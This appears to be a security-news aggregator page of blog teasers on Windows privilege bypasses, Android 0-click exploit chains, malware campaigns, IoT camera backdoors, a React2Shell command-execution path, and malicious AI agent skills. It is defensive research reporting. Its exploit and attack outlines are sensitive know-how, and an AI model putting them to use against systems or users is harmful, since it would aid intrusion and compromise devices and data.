In my previous blog post I mentioned the GetProcessHandleFromHwnd API. This was an API I didn't know existed until I found a publicly disclosed UAC bypass using the Quick Assist UI Access application. This API looked interesting so I thought I should take a closer look. I typically start by reading the documentation for an API I don't know about, assuming it's documented at all. It can give you an idea of how long the API has existed as well as its security properties. The documentation's remarks contain the following three statements that I thought were interesting: If the caller has UIAccess, however, they can use a windows hook to inject code into the target process, and from within the target process, send a handle back to the caller. GetProcessHandleFromHwnd is a convenience function...
https://projectzero.google/2026/02/gphfh-deep-dive.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Staying One Step Ahead: Strengthening Android's Lead in Scam Protection
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse
We've shared how Android's proactive, multi-layered scam defenses utilize Google AI to protect users around the world from over 10 billion suspected malicious calls and messages every month1. While that scale is significant, the true impact of these protections is best understood through the stories of the individuals they help keep safe every day. This includes people like Majik B., an IT professional in Sunnyvale, California.
Despite his technical background, Majik recently found himself on a call that felt dangerously legitimate. While using his Pixel, he received a call that appeared to be from his bank. The number looked correct, the...
http://security.googleblog.com/2026/02/strengthening-android-lead-in-scam-protection.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Celebrating Two Years of CSF 2.0!
Celebrate this milestone with us! Email us at csf [at] nist.gov (csf[at]nist[dot]gov) or tag @NISTcyber on X telling us what your favorite CSF 2.0 resource is (or how your organization has benefitted from implementing the CSF 2.0). Today marks two years since the publication of the Cybersecurity Framework (CSF) 2.0! Published in 2024, the CSF 2.0 included the addition of a Govern Function, increased emphasis on cybersecurity supply chain risk management, updated categories and subcategories to address current threat and technology shifts, and expansion into a suite of resources designed to make the CSF 2.0 easier to
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-two-years-csf-20
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Keeping Google Play & Android app ecosystems safe in 2025
Posted by Vijaya Kaza, VP and GM, App & Ecosystem Trust
The Android ecosystem is a thriving global community built on trust, giving billions of users the confidence to download the latest apps. In order to maintain that trust, we're focused on ensuring that apps do not cause real-world harm, such as malware, financial fraud, hidden subscriptions, and privacy invasions. As bad actors leverage AI to change their tactics and launch increasingly sophisticated attacks, we've deepened our investments in AI and real-time defenses over the last year to maintain the upper hand and stop these threats before they reach users.
Upgrading Google Play's AI-powered, multi-layered user protections
We've seen a clear impact from these safety efforts on Google Play. In 2025, we prevented over...
http://security.googleblog.com/2026/02/keeping-google-play-android-app-ecosystem-safe-2025.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Administrator Protection by Abusing UI Access
In my last blog post I introduced the new Windows feature, Administrator Protection and how it aimed to create a secure boundary for UAC where one didn't exist. I described one of the ways I was able to bypass the feature before it was released. In total I found 9 bypasses during my research that have now all been fixed. In this blog post I wanted to describe the root cause of 5 of those 9 issues, specifically the implementation of UI Access, how this has been a long standing problem with UAC that's been under-appreciated, and how it's being fixed now. A Question of Accessibility Prior to Windows Vista any process running on a user's desktop could control any window created by another, such as by sending window messages. This behavior could be abused if a privileged user, such as SYSTEM,...
https://projectzero.google/2026/02/windows-administrator-protection.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
LummaStealer Is Getting a Second Life Alongside CastleLoader
Bitdefender researchers have discovered a surge in LummaStealer activity, showing how one of the world's most prolific information-stealing malware operations managed to survive despite being almost brought down by law enforcement less than a year ago.
LummaStealer is a highly scalable information-stealing threat with a long history, having operated under a malware-as-a-service model since it appeared on the scene in late 2022.
The threat quickly evolved into one of the most widely deployed in
https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Helpful Skills or Hidden Payloads? Bitdefender Labs Dives Deep into the OpenClaw Malicious Skill Trap
With hundreds of malicious OpenClaw skills blending in among legitimate ones, manually reviewing every script or command isn't realistic — especially when skills are designed to look helpful and familiar.
That's why Bitdefender offers a free AI Skills Checker, designed to help people quickly assess whether an AI skill might be risky before they install or run it.
Using the tool, you can:
* Analyze AI skills and automation tools for suspicious behavior
* Spot red flags like hidden execution,
https://www.bitdefender.com/en-us/blog/labs/helpful-skills-or-hidden-payloads-bitdefender-labs-dives-deep-into-the-openclaw-malicious-skill-trap
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Supporting Wayland's XDG activation protocol with Gtk/Glib
One of the biggest sore points with Wayland is its focus stealing protection. The idea is good: an application should not be able to bring itself into focus at an unexpected time, only when the currently active application allows it. Support is still lacking however, which might also be due to Gtk/Glib implementing the required XDG activation protocol but not really documenting it. It took me a bit of time to figure this out without any public information, this article will hopefully make things easier for other people.
Contents
How the XDG activation protocol works
State of implementation in Gtk/Glib
Starting applications via Gio.AppInfo
Starting applications by other means
How the XDG activation protocol works
The main idea behind the XDG activation protocol...
https://palant.info/2026/02/03/supporting-waylands-xdg-activation-protocol-with-gtk/glib/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529
In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability. I'll explain the technical details of turning a potentially exploitable crash into a working exploit: a journey filled with dead ends, creative problem solving, and ultimately, success. The Vulnerability: A Quick Recap If you haven't already, I highly recommend reading my detailed writeup on this vulnerability before proceeding. As...
https://projectzero.google/2026/01/sound-barrier-2.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Android Trojan Campaign Uses Hugging Face Hosting for RAT Payload Delivery
Bitdefender researchers have discovered an Android RAT (remote access trojan) campaign that combines social engineering, the resources of the Hugging Face online platform as staging, and extensive use of Accessibility Services to compromise devices.
https://www.bitdefender.com/en-us/blog/labs/android-trojan-campaign-hugging-face-hosting-rat-payload
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Android Theft Protection Feature Updates: Smarter, Stronger
Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team
Phone theft is more than just losing a device; it's a form of financial fraud that can leave you suddenly vulnerable to personal data and financial theft. That's why we're committed to providing multi-layered defenses that help protect you before, during, and after a theft attempt.
Today, we're announcing a powerful set of theft protection feature updates that build on our existing protections, designed to give you greater peace of mind by making your device a much harder target for criminals.
Stronger Authentication Safeguards
We've expanded our security to protect you against an even wider range of threats. These updates are now available for Android devices running Android...
http://security.googleblog.com/2026/01/android-theft-protection-feature-updates.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Celebrating Data Privacy Week with NIST's Privacy Engineering Program
Grab your party hats – it's Data Privacy Week! Data Privacy Week is a global initiative led by the National Cybersecurity Alliance to spread awareness about online privacy and empower individuals and businesses to respect privacy, safeguard data, and enable trust. In celebration of this week, the NIST Privacy Engineering Program is reflecting on recent work and looking ahead to what's coming in the new year. Throughout 2026, we plan to continue collaborating with our privacy stakeholder community to develop and advance privacy risk management guidelines to help organizations of all sizes
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-data-privacy-week-nists-privacy-engineering-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing Windows Administrator Protection
A headline feature introduced in the latest release of Windows 11, 25H2 is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and importantly, securable system to allow a local user to access administrator privileges only when necessary. This blog post will give a brief overview of the new feature, how it works and how it's different from UAC. I'll then describe some of the security research I undertook while it was in the insider preview builds on Windows 11. Finally I'll detail one of the nine separate vulnerabilities that I found to bypass the feature to silently gain full administrator privileges. All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional...
https://projectzero.google/2026/26/windows-administrator-protection.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here?
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement. Audio Attack Surface The Dolby UDC is part of the 0-click attack surface of most Android devices because of audio transcription in the Google Messages application. Incoming audio messages are transcribed before a user interacts with the message. On Pixel 9, a second process com.google.android.tts also decodes incoming audio. Its purpose is not completely clear, but it seems to be related to making incoming messages searchable.
https://projectzero.google/2026/01/pixel-0-click-part-3.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context. As per the AOSP documentation, the mediacodec SELinux context is intended to be a constrained (a.k.a sandboxed) context where non-secure software decoders are utilized. Nevertheless, using my DriverCartographer tool, I discovered an interesting device driver, /dev/bigwave that was accessible from the mediacodec SELinux context. BigWave is hardware present on the Pixel SOC that accelerates AV1 decoding tasks, which explains why it is accessible from the mediacodec context. As previous research has copiously affirmed, Android drivers for hardware devices are prime places to find powerful local...
https://projectzero.google/2026/01/pixel-0-click-part-2.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription. Incoming SMS and RCS audio attachments received by Google Messages are now automatically decoded with no user interaction. As a result, audio decoders are now in the 0-click attack surface of most Android phones. I've spent a fair bit of time investigating these decoders, first reporting CVE-2025-49415 in the Monkey's Audio codec on Samsung devices. Based on this research, the team reviewed the Dolby Unified Decoder, and Ivan Fratric...
https://projectzero.google/2026/01/pixel-0-click-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When AI Gets Bullied: How Agentic Attacks Are Replaying Human Social Engineering
AI Security Insights – January 2026
https://www.f5.com/labs/articles/when-ai-gets-bullied-how-agentic-attacks-are-replaying-human-social-engineering
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Podcast – GirlsTalkCyber – Episode 24
I spoke to the GirlsTalkCyber podcast about understanding and being aware of threats against critical infrastructure. We talked about things you should think about as geopolitical, economic, and climate instability increase across the world and how that relates to cyber threats. https://girlstalkcyber.com/24-what-happens-if-hackers-poison-the-water-interview-with-lesley-carhart/
https://tisiphone.net/2026/01/13/podcast-girlstalkcyber-episode-24/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Smashing Security – 449: How to scam someone in seven days
I am so excited to be on Smashing Security! Such a huge pleasure to finally make it onto one my favorite podcasts of all time with Graham Cluley! While I spoke about the jobs market and what students and hiring managers should be doing about it, Graham told me that my star sign isn’t good […]
https://tisiphone.net/2026/01/07/smashing-security-449-how-to-scam-someone-in-seven-days/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Backdoors in VStarcam cameras
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.
So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer's passwords.
A reminder: “P2P”...
https://palant.info/2026/01/07/backdoors-in-vstarcam-cameras/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
Understanding mDL credential formats Standards in the VDC Ecosystem In our first blog post in this series, we highlighted that VDCs can represent a wide range of credentials, from a driver's license to a diploma to proof of age. The ability to use VDCs in a wide variety of use cases is a major reason why many are looking at the VDC ecosystem as technology that can change how we present identity and attributes (both in person and online). While credential variety is a good thing, interoperability requires a common set of standards and protocols for issuing, using, and verifying VDCs. The next
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-0
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analysis of PPPP “encryption”
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”:
Keys are static and usually trivial to extract from the app.
No matter how long the original key, it is mapped to an effective key that's merely four bytes long.
The “encryption” is extremely susceptible to known-plaintext attacks, usually allowing reconstruction of the effective key from a single encrypted packet.
So this thing is completely broken, why look any further? There is at least one situation where you don't know the app being used so you cannot extract the key and you don't have any traffic to analyze either. It's when you are trying to scan your local network for potential hidden cameras.
This script will currently only work for cameras using plaintext communication....
https://palant.info/2026/01/05/analysis-of-pppp-encryption/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
My Top 5 Recommendations on OT Cybersecurity Student Upskilling
I get asked about where to start learning OT cybersecurity as a student a lot. I fully realize that attention spans are short and people are busy, so without further ado let’s get to my top five recommendations: I hope this gives you a few more ideas! Happy new year!
https://tisiphone.net/2026/01/04/my-top-5-recommendations-on-ot-cybersecurity-student-upskilling/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Destination Cyber Podcast on OT
Please see my recent podcast on OT foundations and current events with Destination Cyber from KBI.FM!
https://tisiphone.net/2026/01/04/destination-cyber-podcast-on-ot/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV Signature Retirement
As per our previous announcement ClamAV file signature retirement has been implemented.Users may notice that file sizes are much smaller today as a result of the signature retirements.After we retired impacted signatures our download file sizes are now:bytecode.cvd: 275 KiBmain.cvd: 85 MiBdaily.cvd: 22 MiBOur team is continuing to monitor alerts and the current threat landscape and we are committed to reintroducing retired signatures as needed.For more detailed information on the ClamAV signature please see our previous blog post.ClamAV Signature Retirement AnnouncementIf you have any questions please join our ClamAV mailer here: ClamAV contactOr our ClamAV Discord Server here: ClamAV Discord Server
https://blog.clamav.net/2025/12/clamav-signature-retirement.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Welcome to the new Project Zero Blog
While on Project Zero, we aim for our research to be leading-edge, our blog design was … not so much. We welcome readers to our shiny new blog! For the occasion, we asked members of Project Zero to dust off old blog posts that never quite saw the light of day. And while we wish we could say the techniques they cover are no longer relevant, there is still a lot of work that needs to be done to protect users against zero days. Our new blog will continue to shine a light on the capabilities of attackers and the many opportunities that exist to protect against them. From 2016: Windows Exploitation Techniques: Race conditions with path lookups by James Forshaw From 2017: Thinking Outside The Box by Jann Horn
https://projectzero.google/2025/12/welcome.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2026 Cybersecurity Predictions
Whatever you think will happen… will happen faster and with more acronyms than ever before.
https://www.f5.com/labs/articles/2026-cybersecurity-predictions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unpacking VStarcam firmware for fun and profit
One important player in the PPPP protocol business is VStarcam. At the very least they've already accumulated an impressive portfolio of security issues. Like exposing system configuration including access password unprotected in the Web UI (discovered by multiple people independently from the look of it). Or the open telnet port accepting hardcoded credentials (definitely discovered by lots of people independently). In fact, these cameras have been seen used as part of a botnet, likely thanks to some documented vulnerabilities in their user interface.
Is that a thing of the past? Are there updates fixing these issues? Which devices can be updated? These questions are surprisingly hard to answer. I found zero information on VStarcam firmware versions, available updates or security fixes....
https://palant.info/2025/12/15/unpacking-vstarcam-firmware-for-fun-and-profit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HTTPS certificate industry phasing out less secure domain validation methods
Posted by Chrome Root Program Team
Secure connections are the backbone of the modern web, but a certificate is only as trustworthy as the validation process and issuance practices behind it. Recently, the Chrome Root Program and the CA/Browser Forum have taken decisive steps toward a more secure internet by adopting new security requirements for HTTPS certificate issuers.
These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation. By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security.
To allow affected website operators...
http://security.googleblog.com/2025/12/https-certificate-industry-phasing-out.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain
After noticing a spike in detections involving what looked like a movie torrent for One Battle After Another, Bitdefender researchers started an investigation and discovered that it was a complex infection chain.
The film, Leonardo DiCaprio's latest, has quickly gained notoriety, making it an attractive lure for cybercriminals seeking to infect as many devices as possible.
People often search for the latest movies on the internet, hoping to find a copy of a new release that has just begun its
https://www.bitdefender.com/en-us/blog/labs/fake-leonardo-dicaprio-movie-torrent-agent-tesla-powershell
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Further Hardening Android GPUs
Posted by Liz Prucka, Hamzeh Zawawy, Rishika Hooda, Android Security and Privacy Team
Last year, Google's Android Red Team partnered with Arm to conduct an in-depth security analysis of the Mali GPU, a component used in billions of Android devices worldwide. This collaboration was a significant step in proactively identifying and fixing vulnerabilities in the GPU software and firmware stack.
While finding and fixing individual bugs is crucial, and progress continues on eliminating them entirely, making them unreachable by restricting attack surface is another effective and often faster way to improve security. This post details our efforts in partnership with Arm to further harden the GPU by reducing the driver's attack surface.
The Growing Threat: Why GPU Security Matters
The Graphics...
http://security.googleblog.com/2025/12/further-hardening-android-gpus.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2025-55182 Exploitation Hits the Smart Home
Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally referred to as React2Shell, affects Node.js applications that allow user-supplied JSON data to influence internal JavaScript object structures. When improperly validated, attackers can escalate this into remote command execution through access to process.mainModule.require and, subsequently, child_process.execSync.
https://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A NICE Retrospective on Shaping Cybersecurity's Future
Rodney Petersen has served as the Director of NICE at the National Institute for Standards and Technology (NIST) for the past eleven years where his focus has been on advancing cybersecurity education and workforce development. He will be retiring from federal government service at the end of the 2025 calendar year. Prior to his role at NIST, he has worked in various technology policy and leadership roles with EDUCAUSE and the University of Maryland. The NICE program, led by the National Institute of Standards and Technology (NIST) in the U.S. Department of Commerce, has its origins in the
https://www.nist.gov/blogs/cybersecurity-insights/nice-retrospective-shaping-cybersecuritys-future
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fallacy Failure Attack
AI Security Insights for November 2025
https://www.f5.com/labs/articles/fallacy-failure-attack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like
Systemic ransomware events in 2025, how Jaguar Land Rover's shutdown exposed Category 3 supply chain risk, with lessons from Toyota, Nissan and Ferrari.
https://www.darknet.org.uk/2025/11/systemic-ransomware-events-in-2025-how-jaguar-land-rover-showed-what-a-category-3-supply-chain-breach-looks-like/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SmbCrawler – SMB Share Discovery and Secret-Hunting
SmbCrawler is a credentialed SMB share crawler for red teams that discovers misconfigured shares and hunts secrets across Windows networks.
https://www.darknet.org.uk/2025/11/smbcrawler-smb-share-discovery-and-secret-hunting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk
Heisenberg Dependency Health Check is a GitHub Action that flags risky or newly introduced dependencies in pull requests using supply-chain signals.
https://www.darknet.org.uk/2025/11/heisenberg-dependency-health-check-github-action-for-supply-chain-risk/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dark Web Search Engines in 2025 – Enterprise Monitoring, APIs and IOC Hunting
Dark web search engines in 2025 and how enterprises use monitoring, APIs and IOC hunting to detect credential leaks, impersonation and supply chain exposure.
https://www.darknet.org.uk/2025/11/dark-web-search-engines-in-2025-enterprise-monitoring-apis-and-ioc-hunting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV Signature Retirement Announcement
ClamAV was first introduced in 2002; since then, the
signature set has grown without bound, delivering as many detections as
possible to the community. Due to continually increasing database sizes and
user adoption, we are faced with significantly increasing costs of distributing
the signature set to the community.To address the issue, Cisco Talos has been working to
evaluate the efficacy and relevance of older signatures. Signatures which no
longer provide value to the community, based on today's security landscape,
will be retired.We are making this announcement as an advisory that our
first pass of this retirement effort will affect a significant drop in database
size for both the daily.cvd and main.cvd.Our goal is to ensure that detection content is targeted to
currently active threats...
https://blog.clamav.net/2025/11/clamav-signature-retirement-announcement.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Trusted hosts bypass via SSH
CVSSv3 Score:
1.8
An Improper Privilege Management vulnerability [CWE-269] in FortiOS, FortiProxy and FortiPAM may allow an authenticated administrator to bypass the trusted host policy via crafted CLI command.
Revised on 2026-05-27 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-25-545
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
mcp-scan – Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers
mcp-scan is a dynamic proxy and guardrail monitor for MCP servers, providing real-time traffic inspection and enforcement for agents and tools.
https://www.darknet.org.uk/2025/11/mcp-scan-real-time-guardrail-monitoring-and-dynamic-proxy-for-mcp-servers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Initial Access Brokers (IAB) in 2025 – From Dark Web Listings to Supply Chain Ransomware Events
Initial access brokers in 2025, how dark web access listings feed ransomware supply chain events like JLR, and what CISOs can do to detect and disrupt them
https://www.darknet.org.uk/2025/11/initial-access-brokers-iab-in-2025-from-dark-web-listings-to-supply-chain-ransomware-events/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reconnoitre – Open-Source Reconnaissance and Service Enumeration Tool
Reconnoitre automates network reconnaissance and service enumeration for penetration testers and red teams using structured, repeatable workflows.
https://www.darknet.org.uk/2025/11/reconnoitre-open-source-reconnaissance-and-service-enumeration-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An overview of the PPPP protocol for IoT cameras
My previous article on IoT “P2P” cameras couldn't go into much detail on the PPPP protocol. However, there is already lots of security research on and around that protocol, and I have a feeling that there is way more to come. There are pieces of information on the protocol scattered throughout the web, yet every one approaching from a very specific narrow angle. This is my attempt at creating an overview so that other people don't need to start from scratch.
While the protocol can in principle be used by any kind of device, it is mostly being used for network-connected cameras. It isn't really peer-to-peer as advertised but rather relies on central servers, yet the protocol allows to transfer the bulk of data via a direct connection between the client and the device. It's hard...
https://palant.info/2025/11/05/an-overview-of-the-pppp-protocol-for-iot-cameras/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Passively Downloading Malware Payloads Via Image Caching
Detailing an improved Cache Smuggling technique to turn 3rd party software into passive malware downloader.
https://malwaretech.com/2025/10/exif-smuggling.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.1 patch version published
Today, we are publishing ClamAV 1.5.1. This version has been released shortly after ClamAV 1.5.0 in order to address several significant issues that were identified following its publication.The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day.ClamAV 1.5.1 is a patch release with the following fixes:Fixed a significant performance issue when scanning some PE filesFixed an issue recording file entries from a ZIP archive central directory which resulted in "Heuristics.Limits.Exceeded.MaxFiles" alerts when using the ClamScan --alert-exceeds-max command line option or ClamD AlertExceedsMax config file optionImproved...
https://blog.clamav.net/2025/10/clamav-151-patch-version-published.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Insertion of Sensitive 2FA Information in logs and debug command
CVSSv3 Score:
2.6
An Insertion of Sensitive Information into Log File vulnerability [CWE-532] in FortiOS may allow an attacker with at least read-only privileges to retrieve sensitive 2FA-related information via observing logs or via diagnose command.
Revised on 2026-06-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-452
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.0 released!
The ClamAV 1.5.0 is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. IMPORTANT: A major feature of the 1.5 release is a FIPS-mode compatible method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. This feature relies on “.cvd.sign” signature files for the daily, main, and bytecode databases. The Freshclam with 1.5.0 will download these files as will the latest version of CVDUpdate. When they are not present, ClamAV will fall back to using the legacy MD5-based RSA signature check.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.5.0.tar.gz" does not require an internet connection to build....
https://blog.clamav.net/2025/10/clamav-150-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sharpening the Focus on Product Requirements and Cybersecurity Risks: Updating Foundational Activities for IoT Product Manufacturers
Update: The comment period for your feedback on the second public draft of NIST IR 8259 has been extended through December 10, 2025. Over the past few months, NIST has been revising and updating Foundational Activities for IoT Product Manufacturers (NIST IR 8259 Revision 1 Initial Public Draft), which describes recommended pre-market and post-market activities for manufacturers to develop products that meet their customers' cybersecurity needs and expectations. Thank you so much for the thoughtful comments and feedback throughout this process; 400+ participants across industry, consumer
https://www.nist.gov/blogs/cybersecurity-insights/sharpening-focus-product-requirements-and-cybersecurity-risks-updating
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reasonable Expectations for Cybersecurity Mentees
Most of my audience is on the more senior end of the career spectrum. As a result, a lot of my writing about careers is aimed at senior cybersecurity professionals, encouraging managers and experienced practitioners to support the next generation. But that doesn't mean newcomers are free from responsibility in their career journey. If you're […]
https://tisiphone.net/2025/09/24/reasonable-expectations-for-cybersecurity-mentees/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Entra ID actor token validation bug allowing cross-tenant global admin
A critical vulnerability discovered in Microsoft's Entra ID (formerly Azure AD) allowed for cross-tenant
access and potential global admin privilege escalation. The flaw was found in the legacy Azure AD Graph API,
which improperly validated the originating tenant for undocumented "Actor tokens." An attacker could use a
token from their own tenant to authenticate as any user, including Global Admins, in any other tenant. This
vulnerability bypassed security policies like Conditional Access. The issue was reported to Microsoft, who
deployed a global fix within days.
https://www.cloudvulndb.org/global-admin-entra-id-actor-tokens
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
More Mozilla User-Agents, Please: a Deep Dive into an Inadvertent Disclosure Scanner
Sensor Intel Series: September 2025 Trends
https://www.f5.com/labs/articles/more-mozilla-user-agents-please-a-deep-dive-into-an-inadvertent-disclosure-scanner
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Top 10 Things I'd Like to See in University OT Cybersecurity Curriculum (2025 Edition)
Most of you who have been following me for a while know that I have a very strange and unusual job in cybersecurity. I’m one of maybe a hundred or so people on earth who does full time incident response and forensics for industrial devices and networks that are hacked. Things like power plants, trains, […]
https://tisiphone.net/2025/09/10/the-top-10-things-id-like-to-see-in-university-ot-cybersecurity-curriculum-2025-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A look at a P2P camera (LookCam app)
I've got my hands on an internet-connected camera and decided to take a closer look, having already read about security issues with similar cameras. What I found far exceeded my expectations: fake access controls, bogus protocol encryption, completely unprotected cloud uploads and firmware riddled with security flaws. One could even say that these cameras are Murphy's Law turned solid: everything that could be done wrong has been done wrong here. While there is considerable prior research on these and similar cameras that outlines some of the flaws, I felt that the combination of severe flaws is reason enough to publish an article of my own.
My findings should apply to any camera that can be managed via the LookCam app. This includes cameras meant to be used with less popular apps of the...
https://palant.info/2025/09/08/a-look-at-a-p2p-camera-lookcam-app/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Open Online Mentoring Guide
I’ve had a sign up for open online career mentoring on my site for quite a number of years now (in addition to running similar career clinics in-person). As I’ve gotten more and more traction internationally on the program, a lot of senior folks have asked how to set up a program for office hours […]
https://tisiphone.net/2025/09/01/open-online-mentoring-guide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stories Ink Interviewed Me, and I love Stories.
I was recently at the Tech Leaders Summit in Hunter Valley and the imitable Jennifer O’Brien covered my backstory and how I got into the odd space of Operational Technology. This is a nice change of format for people who aren’t into podcasts and she tells such a good narrative. It was really cool to […]
https://tisiphone.net/2025/09/01/stories-ink-interviewed-me-and-i-love-stories/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dataform cross-tenant path traversal
Dataform could have allowed a malicious customer to gain unauthorized cross-tenant access
to other customer's code repositories and data. By preparing a maliciously crafted package.json
file, an attacker could exploit a path traversal vulnerability in the npm package installation
process, thereby gaining read and write access in other customers' repositories. According to
Google, there was no evidence of exploitation in the wild.
https://www.cloudvulndb.org/dataform-path-traversal
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.0 release candidate now available!
The ClamAV 1.5.0 release candidate is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The release candidate phase is expected to last two to four weeks before we publish the stable release. This will depend on whether any changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this release candidate, but we are not...
https://blog.clamav.net/2025/08/clamav-150-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS ECS Agent Information Disclosure Vulnerability
A vulnerability in the Amazon ECS agent could allow an introspection server to be accessed off-host.
This information disclosure issue, if exploited, could allow another instance in the same security
group to access the server's data. The vulnerability does not affect instances where off-host access
is set to 'false'. The issue has been patched in version 1.97.1 of the ECS agent.
https://www.cloudvulndb.org/aws-ecs-agent-information-disclosure-vulnerability
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
